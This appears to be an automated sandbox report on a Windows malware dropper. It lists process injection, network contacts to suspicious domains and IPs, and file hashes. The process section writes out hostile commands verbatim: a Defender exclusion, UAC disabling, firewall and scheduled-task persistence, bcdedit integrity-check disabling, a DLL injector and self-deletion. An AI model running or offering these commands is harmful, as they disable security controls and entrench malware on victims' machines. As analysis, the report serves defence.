PID 2236 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2236 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2236 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2236 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2236 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2236 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 2236 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2236 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2236 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2236 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2236 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2236 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2236 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2236 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2236 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2236 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2236 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2236 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2236 wrote to memory of 1332 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\system32\WerFault.exe
PID 2236 wrote to memory of 1332 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\system32\WerFault.exe
PID 2236 wrote to memory of 1332 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\system32\WerFault.exe
PID 2616 wrote to memory of 2804 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\Qfj5AJ57kGhZwhnmVOfbif5t.exe
PID 2616 wrote to memory of 2804 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\Qfj5AJ57kGhZwhnmVOfbif5t.exe
PID 2616 wrote to memory of 2804 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\Qfj5AJ57kGhZwhnmVOfbif5t.exe
PID 2616 wrote to memory of 2804 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\Qfj5AJ57kGhZwhnmVOfbif5t.exe
PID 2616 wrote to memory of 2828 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe
PID 2616 wrote to memory of 2828 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe
PID 2616 wrote to memory of 2828 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe
PID 2616 wrote to memory of 2828 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe
PID 2616 wrote to memory of 2596 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe
PID 2616 wrote to memory of 2596 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe
PID 2616 wrote to memory of 2596 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe
PID 2616 wrote to memory of 2596 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe
PID 1524 wrote to memory of 276 N/A C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe C:\Windows\system32\cmd.exe
PID 1524 wrote to memory of 276 N/A C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe C:\Windows\system32\cmd.exe
PID 1524 wrote to memory of 276 N/A C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe C:\Windows\system32\cmd.exe
PID 1524 wrote to memory of 276 N/A C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 900 N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 900 N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 900 N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 900 N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe C:\Windows\system32\cmd.exe
PID 276 wrote to memory of 1684 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 276 wrote to memory of 1684 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 276 wrote to memory of 1684 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 900 wrote to memory of 1612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 900 wrote to memory of 1612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 900 wrote to memory of 1612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 1760 N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe C:\Windows\rss\csrss.exe
PID 2764 wrote to memory of 1760 N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe C:\Windows\rss\csrss.exe
PID 2764 wrote to memory of 1760 N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe C:\Windows\rss\csrss.exe
PID 2764 wrote to memory of 1760 N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe C:\Windows\rss\csrss.exe
PID 2616 wrote to memory of 1388 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\SDGCSh14AZaeoYIAQDvwVQYj.exe
PID 2616 wrote to memory of 1388 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\SDGCSh14AZaeoYIAQDvwVQYj.exe
PID 2616 wrote to memory of 1388 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\SDGCSh14AZaeoYIAQDvwVQYj.exe
PID 2616 wrote to memory of 1388 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Users\Admin\Pictures\SDGCSh14AZaeoYIAQDvwVQYj.exe
PID 2804 wrote to memory of 2888 N/A C:\Users\Admin\Pictures\Qfj5AJ57kGhZwhnmVOfbif5t.exe C:\Users\Admin\AppData\Local\Temp\u25w.0.exe
PID 2804 wrote to memory of 2888 N/A C:\Users\Admin\Pictures\Qfj5AJ57kGhZwhnmVOfbif5t.exe C:\Users\Admin\AppData\Local\Temp\u25w.0.exe
PID 2804 wrote to memory of 2888 N/A C:\Users\Admin\Pictures\Qfj5AJ57kGhZwhnmVOfbif5t.exe C:\Users\Admin\AppData\Local\Temp\u25w.0.exe
PID 2804 wrote to memory of 2888 N/A C:\Users\Admin\Pictures\Qfj5AJ57kGhZwhnmVOfbif5t.exe C:\Users\Admin\AppData\Local\Temp\u25w.0.exe
PID 1760 wrote to memory of 1784 N/A C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe

"C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2236 -s 2228

C:\Users\Admin\Pictures\Qfj5AJ57kGhZwhnmVOfbif5t.exe

"C:\Users\Admin\Pictures\Qfj5AJ57kGhZwhnmVOfbif5t.exe"

C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe

"C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe"

C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe

"C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240329015412.log C:\Windows\Logs\CBS\CbsPersist_20240329015412.cab

C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe

"C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe"

C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe

"C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Users\Admin\Pictures\SDGCSh14AZaeoYIAQDvwVQYj.exe

"C:\Users\Admin\Pictures\SDGCSh14AZaeoYIAQDvwVQYj.exe"

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Users\Admin\AppData\Local\Temp\u25w.0.exe

"C:\Users\Admin\AppData\Local\Temp\u25w.0.exe"

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\u25w.1.exe

"C:\Users\Admin\AppData\Local\Temp\u25w.1.exe"

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\CBKFBAECBA.exe"

C:\Users\Admin\AppData\Local\Temp\CBKFBAECBA.exe

"C:\Users\Admin\AppData\Local\Temp\CBKFBAECBA.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\CBKFBAECBA.exe

C:\Windows\SysWOW64\PING.EXE

ping 2.2.2.2 -n 1 -w 3000

C:\Users\Admin\Pictures\GAGGKlG51O3Sq3EWazWTmdMP.exe

"C:\Users\Admin\Pictures\GAGGKlG51O3Sq3EWazWTmdMP.exe"

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 yip.su udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
US 104.21.79.77:443 yip.su tcp
US 8.8.8.8:53 piramidglobaltobacco.id udp
US 8.8.8.8:53 shipofdestiny.com udp
US 8.8.8.8:53 sty.ink udp
US 8.8.8.8:53 operandotwo.com udp
US 8.8.8.8:53 sty.ink udp
US 8.8.8.8:53 shipofdestiny.com udp
US 8.8.8.8:53 namemail.org udp
DE 185.172.128.144:80 185.172.128.144 tcp
AT 5.42.64.17:80 5.42.64.17 tcp
US 8.8.8.8:53 cu82342.tw1.ru udp
US 8.8.8.8:53 net.geo.opera.com udp
US 172.67.152.98:443 shipofdestiny.com tcp
SG 217.21.73.190:443 piramidglobaltobacco.id tcp
US 172.67.200.219:443 sty.ink tcp
US 172.67.160.247:443 operandotwo.com tcp
US 172.67.200.219:443 sty.ink tcp
US 104.21.32.142:443 shipofdestiny.com tcp
NL 185.26.182.112:80 net.geo.opera.com tcp
RU 176.57.210.144:443 cu82342.tw1.ru tcp
NL 185.26.182.112:443 net.geo.opera.com tcp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 lawyerbuyer.org udp
GB 95.101.143.19:80 apps.identrust.com tcp
US 104.21.63.71:443 lawyerbuyer.org tcp
US 172.67.170.65:443 lawyerbuyer.org tcp
DE 185.172.128.90:80 185.172.128.90 tcp
US 8.8.8.8:53 guseman.org udp
US 8.8.8.8:53 iplogger.com udp
US 104.21.76.57:443 iplogger.com tcp
DE 185.172.128.65:80 185.172.128.65 tcp
DE 185.172.128.65:80 185.172.128.65 tcp
US 8.8.8.8:53 c75ba9a9-c55e-4795-8cdd-8591da95d806.uuid.statsexplorer.org udp
DE 185.172.128.144:80 185.172.128.144 tcp
DE 185.172.128.209:80 185.172.128.209 tcp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 download.iolo.net udp
US 8.8.8.8:53 download.iolo.net udp
FR 143.244.56.50:80 download.iolo.net tcp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
SG 217.21.73.190:443 piramidglobaltobacco.id tcp
US 8.8.8.8:53 www.microsoft.com udp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
DE 185.172.128.65:80 185.172.128.65 tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
NL 195.20.16.45:80 195.20.16.45 tcp
US 8.8.8.8:53 api.myip.com udp
US 104.26.9.59:443 api.myip.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 34.117.186.192:443 ipinfo.io tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard20.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard20.blob.core.windows.net tcp
US 8.8.8.8:53 stun2.l.google.com udp
US 8.8.8.8:53 server15.statsexplorer.org udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
BG 185.82.216.108:443 server15.statsexplorer.org tcp
NL 74.125.128.127:19302 stun2.l.google.com udp
US 8.8.8.8:53 carsalessystem.com udp
US 172.67.221.71:443 carsalessystem.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
BG 185.82.216.108:443 server15.statsexplorer.org tcp

Files

memory/2236-0-0x0000000000050000-0x000000000005E000-memory.dmp

memory/2236-1-0x000007FEF64E0000-0x000007FEF6ECC000-memory.dmp

memory/2236-2-0x00000000002C0000-0x0000000000340000-memory.dmp

memory/2236-3-0x0000000000170000-0x000000000017A000-memory.dmp

memory/2236-4-0x0000000000190000-0x000000000019A000-memory.dmp

memory/2236-5-0x000000001AB20000-0x000000001AB9E000-memory.dmp

memory/2236-6-0x000000001B310000-0x000000001B38E000-memory.dmp

memory/2236-7-0x0000000001EB0000-0x0000000001ECC000-memory.dmp

memory/2236-8-0x0000000001EF0000-0x0000000001F0C000-memory.dmp

memory/2236-9-0x0000000001EB0000-0x0000000001EC4000-memory.dmp

memory/2236-10-0x0000000001F10000-0x0000000001F24000-memory.dmp

memory/2236-11-0x0000000001EB0000-0x0000000001EC0000-memory.dmp

memory/2236-12-0x0000000001EC0000-0x0000000001ED0000-memory.dmp

memory/2236-13-0x0000000001EB0000-0x0000000001EC8000-memory.dmp

memory/2236-14-0x00000000020C0000-0x00000000020D8000-memory.dmp

memory/2236-15-0x000000001B9D0000-0x000000001BB2A000-memory.dmp

memory/2236-16-0x000000001BB30000-0x000000001BC8A000-memory.dmp

memory/2236-17-0x000000001AB20000-0x000000001ABC4000-memory.dmp

memory/2236-18-0x000000001B7B0000-0x000000001B854000-memory.dmp

memory/2236-19-0x0000000001EB0000-0x0000000001ECA000-memory.dmp

memory/2236-20-0x00000000020E0000-0x00000000020FA000-memory.dmp

memory/2236-21-0x000000001B9D0000-0x000000001BAF2000-memory.dmp

memory/2236-22-0x000000001BC90000-0x000000001BDB2000-memory.dmp

memory/2236-23-0x000000001AB20000-0x000000001AB64000-memory.dmp

memory/2236-24-0x000000001AB70000-0x000000001ABB4000-memory.dmp

memory/2236-25-0x000000001AB70000-0x000000001ABE6000-memory.dmp

memory/2236-26-0x000000001B310000-0x000000001B386000-memory.dmp

memory/2236-27-0x0000000001ED0000-0x0000000001EE0000-memory.dmp

memory/2236-28-0x00000000020E0000-0x00000000020F0000-memory.dmp

memory/2236-29-0x000000001A680000-0x000000001A6B0000-memory.dmp

memory/2236-30-0x000000001AB70000-0x000000001ABA0000-memory.dmp

memory/2236-31-0x000000001B9D0000-0x000000001BA8A000-memory.dmp

memory/2236-32-0x000000001BDC0000-0x000000001BE7A000-memory.dmp

memory/2236-33-0x000000001AB70000-0x000000001ABD0000-memory.dmp

memory/2236-34-0x000000001B310000-0x000000001B370000-memory.dmp

memory/2236-35-0x000000001A680000-0x000000001A6A2000-memory.dmp

memory/2236-36-0x000000001AB70000-0x000000001AB92000-memory.dmp

memory/2236-37-0x000000001BE80000-0x000000001C245000-memory.dmp

memory/2236-38-0x000000001E310000-0x000000001E6D5000-memory.dmp

memory/2236-40-0x000000001A730000-0x000000001A74E000-memory.dmp

memory/2236-39-0x000000001A680000-0x000000001A69E000-memory.dmp

memory/2236-41-0x000000001B9D0000-0x000000001BA4C000-memory.dmp

memory/2236-42-0x000000001BA50000-0x000000001BACC000-memory.dmp

memory/2236-43-0x000000001BE80000-0x000000001BF1C000-memory.dmp

memory/2236-44-0x000000001BF20000-0x000000001BFBC000-memory.dmp

memory/2236-45-0x00000000020F0000-0x00000000020F8000-memory.dmp

memory/2236-46-0x0000000002180000-0x0000000002188000-memory.dmp

memory/2236-47-0x00000000020F0000-0x00000000020FE000-memory.dmp

memory/2236-48-0x0000000002180000-0x000000000218E000-memory.dmp

memory/2236-49-0x00000000020F0000-0x00000000020F8000-memory.dmp

memory/2236-50-0x000000001A680000-0x000000001A688000-memory.dmp

memory/2236-51-0x000000001ABA0000-0x000000001ABC2000-memory.dmp

memory/2236-52-0x000000001B2B0000-0x000000001B2D2000-memory.dmp

memory/2236-53-0x000000001A690000-0x000000001A6AA000-memory.dmp

memory/2236-54-0x000000001ABA0000-0x000000001ABBA000-memory.dmp

memory/2236-55-0x000000001A690000-0x000000001A6A2000-memory.dmp

memory/2236-56-0x000000001ABC0000-0x000000001ABD2000-memory.dmp

memory/2236-57-0x000000001A690000-0x000000001A6B0000-memory.dmp

memory/2236-58-0x000000001ABC0000-0x000000001ABE0000-memory.dmp

memory/2236-59-0x000000001BE80000-0x000000001BF30000-memory.dmp

memory/2236-60-0x000000001BF30000-0x000000001BFE0000-memory.dmp

memory/2236-61-0x000000001BE80000-0x000000001BFF6000-memory.dmp

memory/2236-62-0x000000001C000000-0x000000001C176000-memory.dmp

memory/2236-63-0x000000001B860000-0x000000001B882000-memory.dmp

memory/2616-465-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2616-467-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2616-469-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2616-471-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2616-473-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2616-474-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2616-477-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2616-480-0x0000000000400000-0x0000000000408000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\TarBC44.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
